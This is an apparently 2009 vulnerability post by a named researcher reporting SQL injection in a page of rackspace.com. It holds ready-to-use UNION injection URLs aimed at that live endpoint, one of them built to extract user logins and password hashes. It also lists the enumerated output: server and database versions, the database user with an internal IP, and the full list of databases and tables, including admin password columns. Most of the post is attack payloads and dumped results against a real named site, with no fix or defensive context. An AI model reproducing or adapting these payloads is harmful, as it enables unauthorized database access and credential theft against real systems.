-------------------------------------------------------------------------------------------------------------------------- [+] www.rackspace.com SQL Injection vulnerability [+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ] [+] Date: 01-08-2009 ---------------------------------------------------------------------------------------------------------------------------- http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat (table_schema,table_name),4%20FROM%20information_schema.tables%20-- http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat (user_login,user_pass),4%20FROM%20rscom.wp_users%20-- Host Information Server = Apache/2.0.52 (Red Hat) Version = 5.0.77-log Powered by = PHP/5.1.6 Attack Type = SQL Union Injection Current User = rscom@10.100.100.20 Current Database = rscom Supports Union = yes Union Columns = 4 Url| http://www.rackspace.com/information/mediacenter/award.php?id=101 Vuln: http://www.rackspace.com/information/mediacenter/award.php?id=101+and+1=0+Union Select 1 ,2, UNHEX(HEX([visible])) ,4 Comment: -- Visible Column: 3 Database:rscom information_schema rscom rscom_dev test Tables:pp_admin jboss_auth jboss_users pp_admin pp_commission_type pp_contact pp_contact_email pp_contact_phone pp_contact_type pp_contract_type pp_employee pp_notes pp_partner pp_partner_auth pp_partner_exclusivity pp_partner_info pp_partner_referredcustomer pp_partner_service pp_phone_type pp_service_type pp_status_type pp_w9_type rackspace_agendas rackspace_agendas_data rackspace_agendas_data_types rackspace_agendas_notes rackspace_agendas_participants rackspace_bizspark rackspace_club rackspace_conference_attendees rackspace_conference_auth rackspace_copyrightnotices rackspace_customerbriefing rackspace_december8months rackspace_leaders rackspace_leaders_avatars rackspace_logorequests rackspace_loophole rackspace_me_calculator rackspace_newsarticles rackspace_partners rackspace_partners_questions rackspace_partners_questions_options rackspace_partners_reps rackspace_pressreleases rackspace_search rackspace_search_sidebar rackspace_settings rackspace_sitesubmissions rackspace_survey rackspace_survey_results rackspaceipo_auth rackspaceipo_content rackspaceipo_effectiveness_types rackspaceipo_fwprospectus rackspaceipo_notices rackspaceipo_prospectus rackspaceipo_status_types rackspacestore_accounts rackspacestore_agreements rackspacestore_options rackspacestore_options_dependants rackspacestore_options_types rackspacestore_options_values rackspacestore_orders rackspacestore_payments rackspacestore_payments_types rackspacestore_products rackspacestore_settings rackspacestore_shared_orders_options rackspacestore_shared_products_options rackspacestore_shared_products_specs rackspacestore_specs rackspacestore_specs_types rc_events rc_sitesubmissions ror_cities ror_followup ror_registrants ror_registrants_rackers vendor_auth vgb_baskets vgb_images wp_2_comments wp_2_comments_revver wp_2_links wp_2_options wp_2_postmeta wp_2_posts wp_2_posts_revver wp_2_term_relationships wp_2_term_taxonomy wp_2_terms wp_2_usermeta wp_2_users wp_auth wp_comments wp_comments_revver wp_links wp_options wp_postmeta wp_posts wp_posts_revver wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users Columns: Table pp_admin admin_username admin_password -------------------------------------------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap.org, Infysec, Evilfinger ------------------------------------------------------------------------------------------------------------------------- -- "You only get smarter, by playing a smarter opponent !"